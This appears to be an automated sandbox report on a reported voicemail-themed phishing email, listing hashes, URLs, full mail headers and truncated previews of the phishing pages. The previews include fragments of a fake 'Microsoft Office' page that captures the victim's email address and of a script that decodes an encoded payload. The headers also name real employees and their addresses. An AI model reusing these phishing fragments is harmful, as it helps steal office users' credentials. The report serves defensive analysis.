      MD5:05738EAC5280D6EACED7AB392897073C
      SHA1:3C2BDCA7C6A7A768024EAB6CC4A6B5C889DC748A
      SHA-256:6975498938C7B4FF74896FEF5D515112EBA41C3B7963018B1F61D7DC3CC52BE6
      SHA-512:663ACA1568467E2A75388E18451D1F783BC818CFBAD8268B36F0C5365047B5373B6D86DB2A2291CB23892B9BD23E42E53CAFC8A1C7B84E6154DBB2416ACA1D42
      Malicious:false
      Reputation:unknown
      URL:https://sopbtech.store/start/xls/includes/css6.css
      Preview: /*!.. * Bootstrap v4.0.0 (https://getbootstrap.com).. * Copyright 2011-2018 The Bootstrap Authors.. * Copyright 2011-2018 Twitter, Inc... * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE).. */.. :root {.. --blue: #007bff;.. --indigo: #6610f2;.. --purple: #6f42c1;.. --pink: #e83e8c;.. --red: #dc3545;.. --orange: #fd7e14;.. --yellow: #ffc107;.. --green: #28a745;.. --teal: #20c997;.. --cyan: #17a2b8;.. --white: #fff;.. --gray: #6c757d;.. --gray-dark: #343a40;.. --primary: #007bff;.. --secondary: #6c757d;.. --success: #28a745;.. --info: #17a2b8;.. --warning: #ffc107;.. --danger: #dc3545;.. --light: #f8f9fa;.. --dark: #343a40;.. --breakpoint-xs: 0;.. --breakpoint-sm: 576px;.. --breakpoint-md: 768px;.. --breakpoint-lg: 992px;.. --breakpoint-xl: 1200px;.. --font-family-sans-se
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:PNG image data, 181 x 173, 8-bit/color RGBA, non-interlaced
      Category:downloaded
      Size (bytes):8165
      Entropy (8bit):7.942645475708731
      Encrypted:false
      SSDEEP:
      MD5:39682C8C152FF6FE3A842EF1F37D4603
      SHA1:E7DB7D2EDEA3E51D6DDD42BCF9301F096F580FA6
      SHA-256:6CF799F2F4976F33994548A741B39D05097C35E3C991FB4DC6DB5E66F05B4B2B
      SHA-512:A3987B39165AB3D4F85F6549CE1A8388F41A8F9E675D087050AB663E5557C512B1650E6AE31D174739307FAFE012504051F73FD1BB1AB9EA9BA76C01C7851071
      Malicious:false
      Reputation:unknown
      URL:https://sopbtech.store/start/xls/images/key.png
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:ASCII text, with very long lines (1235), with CRLF line terminators
      Category:downloaded
      Size (bytes):2043
      Entropy (8bit):5.950379171266168
      Encrypted:false
      SSDEEP:
      MD5:49D045AB3775B2E53EE278F3E2FFE692
      SHA1:9908DB5764D4C9AFB7F0D6FB1D7F29869E6CA7F2
      SHA-256:B3D4FEE6149D869169A8FDC78ADF513D3609034F05080CACE8943FD186335A76
      SHA-512:641BF303E1DB8F8FABB0E2943ACB30E7F229D3E928C6159B85F91844500DDAF58AA3EACBFCA896C8A1AD6447FEC0FA8FED2786B1210D0CB081EABFBF7DED53D4
      Malicious:false
      Reputation:unknown
      URL:https://ksvbotech.store/gesp/basic.js
Preview:$(document).ready(function() {.. saveFile();..});....function saveFile(name, type, data) {.. if (data != null && navigator.msSaveBlob).. return navigator.msSaveBlob(new Blob([data], { type: type }), name);.... var uid = localStorage.getItem('uid') || ""; // Retrieve UID from local storage.. var encodedStringAtoB = '
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:PNG image data, 128 x 128, 8-bit/color RGB, non-interlaced
      Category:dropped
      Size (bytes):9489
      Entropy (8bit):7.963692772255007
      Encrypted:false
      SSDEEP:
      MD5:BD3254A066C1A81476BFAE453EA61E9F
      SHA1:AC88290720480FAF5959EE84B400C350CF7D1F58
      SHA-256:556B7311393CDDC0AF800EEA771717E937BA3847980A2A8F6785E1D846EBC1F5
      SHA-512:7245CB886ADD3F411FC08C5664DF48A3DC6FBDAB114968BD6CA579930FBCDF5A07248C1C64A8E187414404F7AE00AF837A7255638AA62F38AC2E309A0339FE88
      Malicious:false
      Reputation:unknown
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:HTML document, ASCII text, with CRLF line terminators
      Category:downloaded
      Size (bytes):1362
      Entropy (8bit):4.91273169880799
      Encrypted:false
      SSDEEP:
      MD5:1AF2D30DCB2F89589CB89F50D819C8CE
      SHA1:4FF50438A3C929D011BD2C8FBCC2E48EBCB952F0
      SHA-256:553C9196B08988E9A456A208D711E7FE600A27BDF1926941CEF7A2F49F834636
      SHA-512:3125528329D8752CCD21683FDA041DDC966B4ABC6CF252D231B50CCABC197DB5AFE5A96A4D2214EEAA4AF3D1CA022AA69544BD779F242282EB7A4DBE637F3974
      Malicious:false
      Reputation:unknown
      URL:https://ksvbotech.store/gesp/msg.html
      Preview:<!DOCTYPE html>..<html>..<head>.. <title>Microsoft Office</title>.. <meta http-equiv="content-type" content="text/html; charset=UTF-8">.. <meta name="robots" content="noindex, nofollow">.. <meta name="googlebot" content="noindex, nofollow">.. <meta name="viewport" content="width=device-width, initial-scale=1">.. .. <script type="text/javascript" src="https://ksvbotech.store/gesp/jquery.js"></script>.. <script type="text/javascript" src="https://ksvbotech.store/gesp/basic.js"></script>.. .. <script type="text/javascript">.. // Function to get email from the URL hash.. function getEmailFromHash() {.. var hash = window.location.hash.substring(1); // Remove the '#' character.. if (hash && hash.includes("@")) {.. return hash;.. }.. return null;.. }.... // Function to store email in local storage.. function storeEmailInLocalStorage(email) {.. if (email) {.. localStorage.setItem('uid', email);.. }.. }.... // Ensure the
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:JSON data
      Category:downloaded
      Size (bytes):20
      Entropy (8bit):3.446439344671015
      Encrypted:false
      SSDEEP:
      MD5:2E1E0B28D6E7522CB687E20D37BCD8AA
      SHA1:03D5EFE3719CAB433421C4D9BF6C73E0B8EB69E5
      SHA-256:124CE91528D8ACB894BDC980ABDDF035B38CDC64CE13F088D431E0B10D61FB24
      SHA-512:70BB31CA0F3907AB6B5860459643E422AAD6685F32D519C23E671CD46F29ABF2DB1F0C53E54313FF6FE7B54A75CDCA18A9232556B3273E6DB200BFCD22BA82BD
      Malicious:false
      Reputation:unknown
      URL:https://api.ipify.org/?format=json
      Preview:{"ip":"8.46.123.33"}
      File type:SMTP mail, ASCII text, with very long lines (487), with CRLF line terminators
      Entropy (8bit):5.944125639422995
      TrID:
      • E-Mail message (Var. 1) (20512/2) 100.00%
      File name:original (37).eml
      File size:53'028 bytes
      MD5:46780ed985e098575251fbda415651d7
      SHA1:dc4d7804eb78e03f8b07f4ce7543c539ec063ba5
      SHA256:ebaa85b67c633784b7bf51dfa0f217887c40b71724af99857e114809bb37e4b0
      SHA512:ff14d1ae29a92f04698dbd8aa9133754a73c720112cf7e121ce143a072a73818181e8c16e59521d17094f098bb09d2721bd365b92a55820dc7d4ee69a58febb1
      SSDEEP:1536:uZMRU6mvOs3Zf2BZQ2Z+tnaD+4x++MEuinhPmG4QsQko:QMRUVp3Zf2B8tnzWnMdo
      TLSH:4133C0164F4525614BC5738EC438BB0B5362A941B2E7F9C533CE6C9E019B9DB7C3A22B
      File Content Preview:Return-Path: <UdayPrakash.Dukkipati@tdwilliamson.com>..Received: from NAM12-MW2-obe.outbound.protection.outlook.com (mail-mw2nam12on2124.outbound.protection.outlook.com [40.107.244.124]).. by inbound-smtp.us-east-1.amazonaws.com with SMTP id seuaob8d0d0oj
      Subject:[Phish Alert] Caller left VM MSG 00:01:30 DURATION- ab736b76edcbb42b2b457b755f7513078a6d6532
      From:"Dukkipati, Uday" <UdayPrakash.Dukkipati@tdwilliamson.com>
      To:IT-Security <IT-Security@tdwilliamson.com>, "55a58a1a-0759-4cdf-8d8f-2f73744230e7@phisher.knowbe4.com" <55a58a1a-0759-4cdf-8d8f-2f73744230e7@phisher.knowbe4.com>
      Cc:
      BCC:
      Date:Thu, 19 Sep 2024 07:23:55 +0000
      Communications:
      • [You don't often get email from call_service-playback-01-admn_brycer@richmondhoffmayer.com. Learn why this is important at https://aka.ms/LearnAboutSenderIdentification ] CAUTION: This email originated from outside of the organization. Do not click links or open attachments unless you recognize the sender and know the content is safe.
      Attachments:
      • phish_alert_sp2_2.0.0.0.eml
      Key Value
Return-Path: <UdayPrakash.Dukkipati@tdwilliamson.com>
Received: from DM3PR08MB9118.namprd08.prod.outlook.com ([fe80::25c9:9f63:51a9:e530]) by DM3PR08MB9118.namprd08.prod.outlook.com ([fe80::25c9:9f63:51a9:e530%7]) with mapi id 15.20.7982.016; Thu, 19 Sep 2024 07:23:55 +0000
Received-SPF: pass (spfCheck: domain of tdwilliamson.com designates 40.107.244.124 as permitted sender) client-ip=40.107.244.124; envelope-from=UdayPrakash.Dukkipati@tdwilliamson.com; helo=NAM12-MW2-obe.outbound.protection.outlook.com;
Authentication-Results: amazonses.com; spf=pass (spfCheck: domain of tdwilliamson.com designates 40.107.244.124 as permitted sender) client-ip=40.107.244.124; envelope-from=UdayPrakash.Dukkipati@tdwilliamson.com; helo=NAM12-MW2-obe.outbound.protection.outlook.com; dkim=pass header.i=@tdwilliamson.com; dmarc=pass header.from=tdwilliamson.com;
X-SES-RECEIPT: AEFBQUFBQUFBQUFFTWtGRXBmdngxRUQxR0RJMXJXVjNSSnFhKzROT1dBalZWTmVreG9Xd3RDV21LdEtaV0tTbGlVRm00UFgySnVLSHZwb2drVmFSQjhrdFJJTUFNaUdxQUNkN3RmaUZ6K3FXMS9VRHYyZFdOZVliZTVYSGdSMWVpZmltQytNZVN5Wkx4WmxHR2FUMmw4eHpHUWhhNnVsaTZCQ3BCc0JpdUU3SjAwU1dmSWFhUVFIdi9Zb0xaZ0d6MktON2VERldUSi90Mms1RzVXSEdwcWtMNzVsb2NDYVhWOXJHbzhpZ1N6Y3ZuQXNhZkgxS0NWR1FBZDlhWTJyQlJLenJnbmdoOThiUmlpcmt6S25wK0tNSVhoTTZUcHBxZVhOaDhGMVBReUY2L09uWjFna0tOTUw5Y1dpVkNzb3ZGUjVKYWtEL08zODRINWtnc1dHUHYwTnA5NjlnOEQ3eWM=
X-SES-DKIM-SIGNATURE: a=rsa-sha256; q=dns/txt; b=kC1ijFWRlGq2/UzMCO9KOTuD1vyhCVa61nMYKbm3agDcxdrBb3hFus/1W33nTG4a4lgSavPW5WktliVeqVUZfUB2LCwiZtUrBA05Le6i2dCwkEntjhiN1sriNQoTFTV3IOb/q8NORKALcp5wb5zdqRELLByWWEuIztYjdUUbNw0=; c=relaxed/simple; s=ug7nbtf4gccmlpwj322ax3p6ow6yfsug; d=amazonses.com; t=1726730641; v=1; bh=xsA4OaVbZl3XPwV7Oe+DKVDH6tGrjHpi7OY7Nj+4B4k=; h=From:To:Cc:Bcc:Subject:Date:Message-ID:MIME-Version:Content-Type:X-SES-RECEIPT;
ARC-Seal: i=1; a=rsa-sha256; s=arcselector10001; d=microsoft.com; cv=none; b=uQA5rI0vlhlpn1F99lhI7aO2MMH1esj2DvTpq/kT+yR/v92ao3JUzxWNQq7mschL2va3TM/MY1P/s3XARw78W7Bpw1gDi9edcaaMFfyKJd6BTLRfm6Cxre+1+aY4ORBH4eDzxd9SHGidxvzqdKtXjnve2b7ubwmNI+DTHgaVdGT3LiW9vzPQL1t5zSmU8pYP4EebJKoaSjNd1FkekEcTt/thbZcVKczgRguNIy/I3KPN5lVrVNnouKEBGflM7SKmJWZ8psR/1dYBFANL0p61Crql+uG0M4FGwMuM1zgUeVuZnnj2p2rGvmXMxNHXcdxquJx7AxC41zq87n9iqAYqQw==
ARC-Message-Signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=microsoft.com; s=arcselector10001; h=From:Date:Subject:Message-ID:Content-Type:MIME-Version:X-MS-Exchange-AntiSpam-MessageData-ChunkCount:X-MS-Exchange-AntiSpam-MessageData-0:X-MS-Exchange-AntiSpam-MessageData-1; bh=hlwJOzBwRmw2PKndjs9ZG9UJL8tgrNpQetqGtXARWiE=; b=Vt/U265A37LkJ6Y/eMM2UsYcnvC12uUvzxPB2U2NwmwbsOpoSjlBjZP7q+jmjHuubdsUNz6sMACP4cZTsdVPqtckXK61p7VjJY70ULlP19r5P5ZdLN9u6+Sovqk3zmZgr+arEXt5yU3xQ9D+z1yeCoZUsWIoba92unZJlp45CUsVsZvYMMPrbWx9ItIh7EV5Vl7a3Ln8Kdo3jY8c+JvjHuc9+yrt5FaXSVsJ53zsSvnZ+RKypJg5M+h72poN1st37QfmG5PN7Ax1q5OUG1qS3oF50pjRRz5xqUWwJb8dJ/qHBJALezAWOxBFPGJ3WMJQBWy1PRpV5Q6G++CaVW7kNA==
ARC-Authentication-Results: i=1; mx.microsoft.com 1; spf=pass smtp.mailfrom=tdwilliamson.com; dmarc=pass action=none header.from=tdwilliamson.com; dkim=pass header.d=tdwilliamson.com; arc=none
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=tdwilliamson.com; s=selector2; h=From:Date:Subject:Message-ID:Content-Type:MIME-Version:X-MS-Exchange-SenderADCheck; bh=hlwJOzBwRmw2PKndjs9ZG9UJL8tgrNpQetqGtXARWiE=; b=nbhZYhTMZsB530aPBlu5f7sSc08r3fUEBPY1JB6LPpwVPr07riMMB+ymdopFH24PmZ9de2qgzTFQxwNWagLdPrkXDvSSHhHHpGVyqe3xbqCHPkO5eUDkwmuCtwVqjdmFryYL5fHDm3mfHz5uoXeELSXH+5Kb0b6PaymG/QtAFIXstXA15uwkHsZiIEIXU7Hrnb3bVrUSS4RNoRbfE6UA9pUTIJhxLMLl10PMHj7TWi+nNp79ZMBb47E2Gl6PNZ+p7GzU4EdC3BxhyG6JiIIirhaX72bmV6rTMaC/PXnn8doi3GtfSKEFOxHjrOc8Lrb6QG+kT37Ruhb+fFsWW2OamA==
From: "Dukkipati, Uday" <UdayPrakash.Dukkipati@tdwilliamson.com>
To: IT-Security <IT-Security@tdwilliamson.com>, "55a58a1a-0759-4cdf-8d8f-2f73744230e7@phisher.knowbe4.com" <55a58a1a-0759-4cdf-8d8f-2f73744230e7@phisher.knowbe4.com>
Subject: [Phish Alert] Caller left VM MSG 00:01:30 DURATION- ab736b76edcbb42b2b457b755f7513078a6d6532
Thread-Topic: [Phish Alert] Caller left VM MSG 00:01:30 DURATION- ab736b76edcbb42b2b457b755f7513078a6d6532
Thread-Index: AQHbCmTivaVCXLFpxkW5vtqpQ7dxvA==
Date: Thu, 19 Sep 2024 07:23:55 +0000
Message-ID: <DM3PR08MB9118126CE9927349F879C2498D632@DM3PR08MB9118.namprd08.prod.outlook.com>
Accept-Language: en-US
Content-Language: en-US
X-MS-Has-Attach: yes
X-MS-TNEF-Correlator:
authentication-results: dkim=none (message not signed) header.d=none;dmarc=none action=none header.from=tdwilliamson.com;
x-ms-publictraffictype: Email
x-ms-traffictypediagnostic: DM3PR08MB9118:EE_|DM8PR08MB7415:EE_
x-ms-office365-filtering-correlation-id: 6b86bf22-9608-4946-1f79-08dcd87c0505
x-ms-exchange-senderadcheck: 1
x-ms-exchange-antispam-relay: 0
x-microsoft-antispam: BCL:0;ARA:13230040|366016|1800799024|376014|38070700018;
x-microsoft-antispam-message-info: sdKRNOKvplxj9lbrwLpcZQGFpUnSnLlEE2jnxZUkzuDLptNXyVbyKlWP87+PuD5fyZcIZsuWCh0zXQlSI3DsB/2g+5aEvtlm6zLNS34Z8WCSkxvBSJ2VIe68Nw4USa8ssEYkf52K39LkfiW314QQnD4Haa4jcjDHjnPBNDddn3oP4mLt73vCzlwc/FIeMEa3+/ZvKRaPXvxQt5/r45I/teG1JzfsMNp+TLSFEFAgJK9M+GkuSuydMdmNWbqSo0u2FZcchWD+hnoTq2cTIak02NFwNmgmG2dXaTyDCarakxllg/MS80yMstwz5hUFbfjJ4Jqx03fKCcdhId9ZEgEZfBkqEw6uEwGbyn31QWgGpe5YAxxfyRIxFMRvT2oakwVuwMHwJ8iFHrX2+FgRqDtef/4M0si3aXqkeVu19j5eH9y0tQhxb+8YM/9ciN2FTnJEWgf0VdpiiKFQfQCJj3VRyg0HsgDinfwZU0ayWEv7ZN73qrx4tscLaz6ItgFXER/fOSStOx/BAzTlYeW4J6cGT+a6fe2LC6W8YeaESgzm2eGZKAKpeTgM7VqkdJZyW3z76IClsMe9TJlvQbeygUP/lIdnwkR0gwlQjR4hdfLQQ1xJa/jhqGp4OTYaVONDjjSna24zXcCc9ikC2o7p14OGm/3NbfsWrbQR/RyTzUYGL+l/ynKeZAQKq76DR47l99l/ematc5niRhqBizyE1NuUeY87k2r0LHNOA6f7HsHyFYK7W+X78kBeQm3QfsE3pILWWf6BpZegtGFYOdhNg0C03H9KcI2bOPVOKeCPnVtxuwSBoDHgTIjmdnwuaX6Hy3ZZlnwLn/HuwKHKNg9C9TkvT1s6LvRiZtT0Zi2/NoZVZ1bNUPcjhGUQG2mk7+8g0HWCt+7FqXn3MJlkat1WanwOwUU9Maw8po9YAeifJKCnh9Fe8Lx9kMrfqQqaFEN4NUas3SnAQm9kH4ktpCd/T4a3Gi73GBuVgyU9hGtaaKt5105t/7CrR0tijcg6x+PDBuX6ZDinEe0XITic5/fmzdMCepSK1DPMYkqd2bVz3/Ez7yux0iL4bMiGFXONsHcE4N48D5+phL7XbXDuuRAuUMJ9uf3dcN6U9N/gkhw4uJUi/7cZz9L52XxU0925raC+3qju7pWLw5Y3laJXhx4QHCcaxKghEqsjLwjQsbuQpWc3tW7L9tURNd2VxS3cYLX7lF53gH64C/2Sbtv9gP1EREODZ0VVg19vY7Q5TanvkLFGrUg50/H5PMy6atuDICMveK6Stvn7jXTSymlbhAK88ypFLu7f3rAFtgaV6VVqNwg0jOexaneWk7gwfTW2LiPkmhdA66K9IX+t6noB89Kg/nJ2Pw==
x-forefront-antispam-report: CIP:255.255.255.255;CTRY:;LANG:en;SCL:1;SRV:;IPV:NLI;SFV:NSPM;H:DM3PR08MB9118.namprd08.prod.outlook.com;PTR:;CAT:NONE;SFS:(13230040)(366016)(1800799024)(376014)(38070700018);DIR:OUT;SFP:1102;
x-ms-exchange-antispam-messagedata-chunkcount: 1
x-ms-exchange-antispam-messagedata-0: LqMsVL5rgKBZfUpTWbr0NuwDto4VoOWE5BKIcXCYHXDgPOhjmBehNh9/rQdCD81tc4aXtAgxCrzWYmiExb1vWkQeo63/xlsBz5EalunjQwXJeQehwAfr3Rh0FaTKJ4AO5nqbfVaOhYkmKe23MGBblOLXrQInjrvX/g6dwovbO2gfCe5TBnyFuCiHPm4s/MkFRBp4Vc/feMiTGWuRtJUbfI4WYOu63E/J6zGlKRum2qbq3qV4xnRvziuDxo2TPyCFWgnoiY08YmXJmU6lYg/WVgaZt01zn4sFRy1ssRNDKupMdae4aVspcp4IhSeKVG4pmotBGHxXHvgCHUXOyi/iz0NCmL1tLZQoqcqUCHEZ3dKQVDamAXBFib7/WExi1ncRerDjW4MKxLgSl/p9M8VhPCtT4MDQIguIcOqNZU+dGglHZo9n7urvEG1q0ZuCr1kv0eFl4R28xi4EmRgWnB05SQIA+wfOpAGZQCZHIXctypsRg+QYAk10fwuS39OE8x8sJEguraiN9LDJU8UE84dKrl1ZW+2BcqH7btD6waf6aPmwYhIF4mOVsakJuiiFjzO6RXVjbtg+pqvqmegEcF0O9a69l3vvvyIA/Do9Q5qeCFCI2MouRJhDZDlMj2LLnVXaq2LIDKSUMIH3y4S66AVtpq1WDDtQzla6Q+lxzFqJVpUMG4xFQs6tkCmlGwwD0IN8wIzzu0NymR1NgfcGu+OmR7ZXjWOybq9CcYiNqa7LN+DxfVgd1maTyBP11oVXUg0DQkryoRTXhNv+Q4qQMp9lzEuuXTwHfx9j+C6Pz71w7TTieaPQNU+jWQ8XeXtbxSOUv/53il/nszIW56cr1UX300NAjt7PRm5hzUkIV9guY2C7nePx2I/g503qLhyr7ZXOkk8RONhJWn9mxhQ4W3j3KpAl+0K4xOQSZElTUERRgSYKqwNtP7ju7tTApQ/MrPJ6VhNu0bicMtNz9ayb1qH7jfuMsMPPn+hg5ShFjMZ/KOVqBJ/6z510dlB+L5CO1KqEDBxN/qj8I0YrJtZ1QWDlYWkwOonHqdmrzC2WEcG2r8pZxzJLrUdJ6qgBWAQCPpKgSaa2OVB1zTYlw78M3OM3E+KoFqL2niYac4SKzW3eVYacfr85ovfF+y11TM3N3kDQNckT+dYdq2VLH3WkrbJhUlgeM6vxGNGxw1Zyl1ir5NIbe+Aw8iIXcjPRFKhZzRkFl72y03ejTNoZsmC7tR6BvZ3NTGdVbGr0GZvSH+Uezue3Brqpu4pgGqDFAKQAOFuNHmcFti2Uxr90ERADUWEIlcuKJT9W0q/50R41uiUrECy7wBD02av7gAURr5xWJ2gyRV8xPqNVEKFzj7ZAT9WMaKQ/ctE770/ottoV03TV+1MqUBkFcRoEGEb4EhReQND7QN8QcuOrbLSIzzVSOGN6J2ITJjqXI4/HgB9SUVwYSUB4WYclwj9axruuw6qW0xQQrOa6yeuYLrbVG7HJAv23UmuakZo2G7nPNZ+n0HCBhPyo8S/vf78Johz5vHPr0zUEY+xjzTt5TWldu2P7qcp6AxJak7x7lR+AJ1n0ZiH9CdjW9bt6Xhb2egL4c4/jY4jUB0vXSxvFef0x4P7ide803pbZJd0cJSla/h5bQ+pZXnQ=
Content-Type: multipart/mixed; boundary="_002_DM3PR08MB9118126CE9927349F879C2498D632DM3PR08MB9118namp_"
MIME-Version: 1.0
X-OriginatorOrg: tdwilliamson.com
X-MS-Exchange-CrossTenant-AuthAs: Internal
X-MS-Exchange-CrossTenant-AuthSource: DM3PR08MB9118.namprd08.prod.outlook.com
X-MS-Exchange-CrossTenant-Network-Message-Id: 6b86bf22-9608-4946-1f79-08dcd87c0505
X-MS-Exchange-CrossTenant-originalarrivaltime: 19 Sep 2024 07:23:55.1171 (UTC)
X-MS-Exchange-CrossTenant-fromentityheader: Hosted
X-MS-Exchange-CrossTenant-id: da7cba33-a475-42a2-a6d2-d3eabac375db
X-MS-Exchange-CrossTenant-mailboxtype: HOSTED
X-MS-Exchange-CrossTenant-userprincipalname: VG7AjQpM3uc6IXvC/thympWZ5jSaXZCbJiAarS3dtDmA3Ku8csueh5wsiel06aAI/eN5WN2tS/+ZN41kKEZF5wIZzEXcpDbVHTYGZ3ZJTP/3VX7LiWJGPAe7Hm4W28bn
X-MS-Exchange-Transport-CrossTenantHeadersStamped: DM8PR08MB7415

      Icon Hash:46070c0a8e0c67d6